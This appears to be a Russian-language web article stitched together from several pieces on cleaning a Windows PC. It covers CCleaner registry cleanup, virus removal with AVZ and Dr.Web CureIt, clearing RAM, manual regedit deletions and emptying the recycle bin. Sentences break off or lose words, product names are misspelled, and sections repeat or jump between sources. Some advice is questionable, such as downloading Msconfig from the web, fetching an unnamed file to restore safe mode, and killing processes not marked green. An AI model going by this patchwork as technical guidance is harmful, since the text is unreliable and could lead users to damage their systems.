Можете портативную версию CCleaner, работающую без установки и носить её с собой на флешке. Есть версия даже для Mac.
Скачали, запускаем программу от имени администратора.
В первую очередь идём в Настройки и выбираем русский язык.
Вкладка Реестр. Нажимаем на кнопку Поиск проблем.
В первый раз программа найдёт очень много ошибок.
Нажимаем Исправить.
И выбираем место для сохранения резервной копии.
Затем можете просмотреть все ошибки реестра или просто нажать кнопку Исправить отмеченные.
Данная резервная копия будет вам нужна если после очистки реестра что-то пойдёт не так. Что может пойти не так? К примеру какая-нибудь уже активированная программа заново попросит активацию, но не беспокойтесь, это бывает очень редко. В этом случае нажмёте двойным щелчком правой мыши на резервном файле реестра
Ответите Да
В какой-то момент понимаешь, что нужно подвергнуть компьютер полной очистке. Как полностью очистить компьютер? Для начала проверить на вирусы, почистить реестры, почистить оперативную память устройства, корзину…
Делать это время от времени обязательно нужно, чтобы компьютер хорошо и быстро работал, а также как можно дольше оставался в работоспособном состоянии. В противном случае вам понадобится ремонт компьютера, и очень срочно.
Лечимся бесплатно
Поговорим сегодня о том, как бесплатно почистить компьютер от вирусов. Чтобы бесплатно вылечить компьютер от вирусов, нужно найти в интернете программу AVZ и утилиту Curelt DrWeb. Для начала лечения нам нужно запустить систему в безопасном режиме. Чтобы это сделать, когда компьютер будет включаться, нажмите клавишу F8.
В появившемся контекстном меню выберите опцию «безопасный режим». Если это привело к перезагрузке системы, значит вирус задел реестр Windows, тогда вам нужно найти в интернете файл, который помогает восстанавливать безопасный режим, включить его и опять повторить процедуру.
Затем после загрузки в безопасном режиме включите программу AVZ;
Сразу перейдите в меню файл - восстановление системы;
Выбирайте все пункты и нажимайте выполнить.
После этого нужно зайти в меню сервис — диспетчер процессов и убрать все процессы, не подсвеченные зеленым цветом.
На этом очистка компьютера от вирусов не закончена, обслуживание продолжается. Зайдите в меню файл — мастер поиска и устранения проблем и выполните очистку системы. Это позволит нейтрализовать вирусы, но не удалит их.
Помощь Curelt
Лечение компьютера от вирусов продолжается. Как вы помните, мы скачали утилиту Curelt, которая дает возможность очистить компьютер от вирусов бесплатно. Программу нужно запустить и поставить на полную проверку. При обнаружении вирусов, вам будет предложено вылечить их или удалить. Несколько часов проверки дадут возможность убрать вирусы из системы.
загружаете операционную систему;Многие не знают, как очистить компьютер от вирусов, используя еще один компьютер. А вот, как: вам понадобится ничем не зараженный компьютер с установленным антивирусом. Соблюдайте осторожность, чтобы не повредить данные. Для реализации этого способа нужно снять жесткий диск с зараженного компьютера и выполнить его подключение к исправному (компьютеры при этом выключены). После этого:
включаете проверку на вирусы;
через несколько часов проверка закончится.
Лишившись вирусов, можно возвращать жесткий диск на место.
Что делать если чистка компьютера от вирусов не привела к их полному удалению? В этом случае можно посоветовать воспользоваться другой бесплатной (или платной) утилитой или, в крайнем случае, переустановить операционную систему.
Чистим ОЗУ
Поговорим о том, как очистить оперативную память на компьютере. Если ваша операционная память все время занята, посмотрите, чем именно. Для этого нужно открыть диспетчер задач (одновременным нажатием клавиш ctr+alt+del).
После этого во вкладке «Процессы» вы увидите программы, которые в текущий момент открыты системой. Для выгрузки ненужных программ из операционной памяти, нажмите на кнопку «Закончить процесс». Только постарайтесь случайно не закончить процесс, который нужен для функционирования системы.
Как очистить ОЗУ на компьютере? Для отмены автоматической загрузки программ в память, уберите программы из списка автоматической загрузки. Для этого в сети можно скачать специальную утилиту Msconfig.
Мы рассмотрели два самых распространенных способа как очистить озу компьютера. Если после этого вы обнаруживаете, что ваша память вновь постоянно забита, обратитесь к специалисту, для которого ремонт компьютеров — дело привычное или в компьютерный сервис, чтобы они нашли причину и провели обслуживание на профессиональном уровне.
Чистим реестр
Для того, чтобы запомнить, как очистить реестр на компьютере, необходимо проделать несложные манипуляции всего один раз. Итак, приступим.
Чтобы перейти в редактор реестра нужно нажать пуск, выбрать пункт выполнить. Затем нажимаем открыть и в появившемся поле пишем regedit. Затем нажимаем ОК.
Перед вами редактор реестра. Среди представленных пунктов нас интересует Мой компьютер, который нужно развернуть и из выбранного списка нужно развернуть раздел HKEY_CURRENT_USER, потом выберите Software и в появившемся списке будут отображены все программы компьютера.
Внимательно просмотрите весь список и выберите из него записи об уже удаленных программах. Выбрав запись о программе, которой уже нет, удалите ее. Для этого используйте кнопку Delete или клацните правой кнопкой и выберите удалить. После удаления ненужных записей, закройте редактор и выполните перезагрузку системы.
Удаляем мусор из корзины
Перед тем, как очистить корзину на компьютере, рекомендуем вам посмотреть, нет ли там чего-нибудь полезного. Если нет - смело приступаем к чистке.
Чтобы очистить корзину, клацните по соответствующему ярлыку на рабочем столе правой кнопкой мыши и в появившемся контекстном меню нажмите левой кнопкой на «очистить корзину».
Если вы хотите просмотреть файлы перед удалением, тогда двойным быстрым нажатием левой кнопкой мыши на ярлык, откройте ее. Просмотрите файлы и вверху, после адресной строки, клацните левой кнопкой мыши на фразу «очистить корзину». Компьютер спросит вашего подтверждения действия. Нажимайте левой кнопкой на «да».
Теперь вы знаете, как очистить компьютер полностью. Не забывайте делать такую очистку системы хотя бы раз в полгода, а ремонт компьютеров пускай делают другие!
Совсем недавно, пару лет назад, кто-то сделал прогноз, что через пару лет ходить по сайтам интернета станет так же опасно, как по темным улицам города. Сейчас компьютерные вирусы стали очень распространены, и это утверждение воплотилось в жизнь.
Вирусами называются компьютерные программы, мешающие продуктивной работе пользователя на компьютере. При заражении компьютера вирусами, вирусы практически всегда прописываются в реестр операционной системы. Компьютерные вирусы могут вызвать: выключение или перезагрузку компьютера, торможение операционной системы, порча и удаление файлов, атаки серверов через интернет, увеличение компьютерного трафика и многие другие действия.
Для того чтобы требуется несколько действий. Требуется очистить оперативную память от вирусов, удалить вирус с жесткого диска и удалить ссылки на вирусы из реестра windows. После требуется установить качественный антивирус, или комплекс антивирусной защиты. Для полной защиты компьютера, для начала, требуется грамотно отремонтировать реестр. Ремонт и анализ реестра производится следующими программами:
AVPTool от Лаборатории Касперского или Dr. Web CureIt от компании Доктор Веб.
Выбор какой программой сканировать ваш компьютер на наличие вирусов зависит от установленного на вашем компьютере антивируса. Проверять следует сторонним антивирусам. То есть если у вас установлен Касперский, то проверять необходимо Доктор Вебом. При проверке сторонним антивирусом, необходимо временно приостановить защиту основного антивируса.
Для , компьютер следует загрузить в безопасном режиме. После этого запустить одну из загруженных утилит. При обнаружении вируса следует его вылечить, либо если лечение невозможно перенести или и ссылки в реестре. После этого перезагрузите компьютер в обычном режиме.
Отключите соединение с интернетом и закройте все открытые приложения. Запустите программу AVZ и обновите базы сигнатуры. Затем запустите сканирование системы. Программа начнет и автоматически исправит ссылки в реестре и удалит вирусы.
Так же можно про сканировать компьютер другой утилитой HiJackThis. Запустите от имени администратора HiJackThis и щелкните по кнопке «Do a system scan and save a logfile».
Для оптимизации операционной системы после , существует множество программ. Многие утилиты ремонтируют реестр компьютера, удаляют ненужные файлы и выполняют дефрагментацию жестких дисков.
При работе с исправлением реестра нужно быть предельно внимательным. Любые неправильные изменения могут привести к неисправности операционной системы, и даже к ее поломке. То есть при неправильных действиях компьютер может не загрузиться.
